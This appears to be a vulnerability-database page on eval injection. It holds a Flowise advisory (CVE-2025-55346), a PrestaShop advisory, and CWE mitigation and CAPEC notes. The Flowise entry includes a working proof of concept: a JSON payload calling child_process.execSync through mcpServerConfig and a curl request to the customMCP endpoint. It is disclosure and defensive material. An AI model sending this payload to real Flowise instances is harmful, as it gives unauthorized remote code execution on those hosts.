            return tools as Tool[]
        } catch (error) {
            throw new Error(`Invalid MCP Server Config: ${error}`)
        }
    }
}

Here, the value of inputString originating from mcpServerConfig is being concatenated to a dynamic Function constructor that evaluates the provided value similar to using eval:

function convertToValidJSONString(inputString: string) {
    try {
        const jsObject = Function('return ' + inputString)()
        return JSON.stringify(jsObject, null, 2)
    } catch (error) {
        console.error('Error converting to JSON:', error)
        return ''
    }
}

This JS code runs in the context of the host, not sandboxed using @flowiseai/nodevm like other code execution functionalities within the platform.

This enables access to the global process object and as a result access to all the native NodeJS modules available such as child_process, leading to Remote Code Execution.

{
    "inputs":{
        "mcpServerConfig":"(global.process.mainModule.require('child_process').execSync('touch /tmp/yofitofi'))"
        },
    "loadMethod":"listActions"
}

PoC

  1. Follow the provided instructions for running the app using Docker Compose (or other methods of your choosing such as npx, pnpm, etc): https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-docker

  2. Create a new file named payload.json somewhere in your machine, with the following data:

{"inputs":{"mcpServerConfig":"(global.process.mainModule.require('child_process').execSync('touch /tmp/yofitofi'))"},
"loadMethod":"listActions"}
  1. Send the following curl request using the payload.json file created above with the following command:
curl -XPOST -H "x-request-from: internal" -H "Content-Type: application/json" --data @payload.json "http://localhost:3000/api/v1/node-load-method/customMCP"
  1. Observe that a new file named yofitofi is created under /tmp folder.

Impact

Remote code execution

Credit

The vulnerability was discovered by Assaf Levkovich of the JFrog Security Research team.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.2.7-patch.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55346"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-627",
      "CWE-95"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-06T14:08:45Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\nUser-controlled input flows to an unsafe implementaion of a dynamic Function constructor , allowing a malicious actor to run JS code in the context of the host (not sandboxed) leading to RCE. \n\n### Details\nWhen creating a new `Custom MCP` Chatflow in the platform, the MCP Server Config displays a placeholder hinting at an example of the expected input structure:\n```json\n{\n\t\"command\": \"npx\",\n\t\"args\": [\"-y\", \"@modelcontextprotocol/server-filesystem\", \"/path/to/allowed/files\"]\n}\n```\n\nBehind the scene, a `POST` request to `/api/v1/node-load-method/customMCP` is sent with the provided MCP Server Config, with additional parameters (excluded for brevity):\n```json\n{\n...SNIP...\n\n   \"inputs\":{\n      \"mcpServerConfig\":{\n         \"command\":\"npx\",\n         \"args\":[\n            \"-y\",\n            \"@modelcontextprotocol/server-filesystem\",\n            \"/path/to/allowed/files\"\n         ]\n      }\n   },\n   \"loadMethod\":\"listActions\"\n   \n...SNIP...\n}\n```\n\nSending the same request with the parameter `mcpServerConfig` equals to a plain value and not an object, for example:\n```json\n{\n   \"inputs\":{\n      \"mcpServerConfig\":\"test\"\n   },\n   \"loadMethod\":\"listActions\"\n}\n```\n\nWe enter an interesting code flow that leads to a function named `convertValidJSONString` (Line 103):\nhttps://github.com/FlowiseAI/Flowise/blob/416e57380ea7ce2e66f89aded61b249ff3eef3b2/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L103\n\n```typescript\nasync getTools(nodeData: INodeData): Promise\u003cTool[]\u003e {\n        const mcpServerConfig = nodeData.inputs?.mcpServerConfig as string\n\n        if (!mcpServerConfig) {\n            throw new Error(\u0027MCP Server Config is required\u0027)\n        }\n\n        try {\n            let serverParams\n            if (typeof mcpServerConfig === \u0027object\u0027) {\n                serverParams = mcpServerConfig\n            } else if (typeof mcpServerConfig === \u0027string\u0027) {\n                const serverParamsString = convertToValidJSONString(mcpServerConfig) \u003c--\n                serverParams = JSON.parse(serverParamsString)\n            }\n\n            const toolkit = new MCPToolkit(serverParams, \u0027stdio\u0027)\n            await toolkit.initialize()\n\n            const tools = toolkit.tools ?? []\n\n            return tools as Tool[]\n        } catch (error) {\n            throw new Error(`Invalid MCP Server Config: ${error}`)\n        }\n    }\n}\n```\n\nHere, the value of `inputString` originating from `mcpServerConfig` is being concatenated to a dynamic Function constructor that evaluates the provided value similar to using `eval`:\n\n```typescript\nfunction convertToValidJSONString(inputString: string) {\n    try {\n        const jsObject = Function(\u0027return \u0027 + inputString)()\n        return JSON.stringify(jsObject, null, 2)\n    } catch (error) {\n        console.error(\u0027Error converting to JSON:\u0027, error)\n        return \u0027\u0027\n    }\n}\n```\n\nThis JS code runs in the context of the host, not sandboxed using `@flowiseai/nodevm` like other code execution functionalities within the platform.\n\nThis enables access to the global `process` object and as a result access to all the native NodeJS modules available such as `child_process`, leading to Remote Code Execution.\n```json\n{\n    \"inputs\":{\n        \"mcpServerConfig\":\"(global.process.mainModule.require(\u0027child_process\u0027).execSync(\u0027touch /tmp/yofitofi\u0027))\"\n        },\n    \"loadMethod\":\"listActions\"\n}\n```\n### PoC\n1. Follow the provided instructions for running the app using Docker Compose (or other methods of your choosing such as `npx`, `pnpm`, etc):\n   https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-docker\n\n2. Create a new file named `payload.json` somewhere in your machine, with the following data:\n```\n{\"inputs\":{\"mcpServerConfig\":\"(global.process.mainModule.require(\u0027child_process\u0027).execSync(\u0027touch /tmp/yofitofi\u0027))\"},\n\"loadMethod\":\"listActions\"}\n```\n\n3. Send the following `curl` request using the `payload.json` file created above with the following command:\n```\ncurl -XPOST -H \"x-request-from: internal\" -H \"Content-Type: application/json\" --data @payload.json \"http://localhost:3000/api/v1/node-load-method/customMCP\"\n```\n\n4. Observe that a new file named `yofitofi` is created under `/tmp` folder.\n### Impact\nRemote code execution\n\n## Credit\nThe vulnerability was discovered by Assaf Levkovich of the JFrog Security Research team.",
  "id": "GHSA-hmgh-466j-fx4c",
  "modified": "2025-10-06T14:08:45Z",
  "published": "2025-10-06T14:08:45Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hmgh-466j-fx4c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55346"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    },
    {
      "type": "WEB",
      "url": "https://research.jfrog.com/vulnerabilities/flowise-js-injection-remote-code-exection-jfsa-2025-001379925"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Flowise vulnerable to RCE via Dynamic function constructor injection"
}

GHSA-HRGX-P36P-89Q4

Vulnerability from github – Published: 2022-07-29 22:27 – Updated: 2022-07-29 22:27
VLAI
Summary
PrestaShop eval injection possible if shop vulnerable to SQL injection
Details

Impact

Eval injection possible if the shop is vulnerable to an SQL injection.

Patches

The problem is fixed in version 1.7.8.7

Workarounds

Delete the MySQL Smarty cache feature by removing these lines in the file config/smarty.config.inc.php lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6):

if (Configuration::get('PS_SMARTY_CACHING_TYPE') == 'mysql') {
    include _PS_CLASS_DIR_.'Smarty/SmartyCacheResourceMysql.php';
    $smarty->caching_type = 'mysql';
}
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "prestashop/prestashop"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.6.0.10"
            },
            {
              "fixed": "1.7.8.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-31181"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89",
      "CWE-95"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-07-29T22:27:27Z",
    "nvd_published_at": "2022-08-01T20:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\nEval injection possible if the shop is vulnerable to an SQL injection.\n\n### Patches\nThe problem is fixed in version 1.7.8.7\n\n### Workarounds\nDelete the MySQL Smarty cache feature by removing these lines in the file `config/smarty.config.inc.php` lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6):\n```php\nif (Configuration::get(\u0027PS_SMARTY_CACHING_TYPE\u0027) == \u0027mysql\u0027) {\n    include _PS_CLASS_DIR_.\u0027Smarty/SmartyCacheResourceMysql.php\u0027;\n    $smarty-\u003ecaching_type = \u0027mysql\u0027;\n}\n```\n",
  "id": "GHSA-hrgx-p36p-89q4",
  "modified": "2022-07-29T22:27:27Z",
  "published": "2022-07-29T22:27:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-hrgx-p36p-89q4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31181"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PrestaShop/PrestaShop/commit/b6d96e7c2a4e35a44e96ffbcdfd34439b56af804"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PrestaShop/PrestaShop"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PrestaShop/PrestaShop/releases/tag/1.7.8.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PrestaShop eval injection possible if shop vulnerable to SQL injection"
}

Mitigation
Architecture and Design Implementation

Strategy: Refactoring

If possible, refactor your code so that it does not need to use eval() at all.

Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation
Implementation
  • Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.
  • Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content.
Mitigation
Implementation

For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.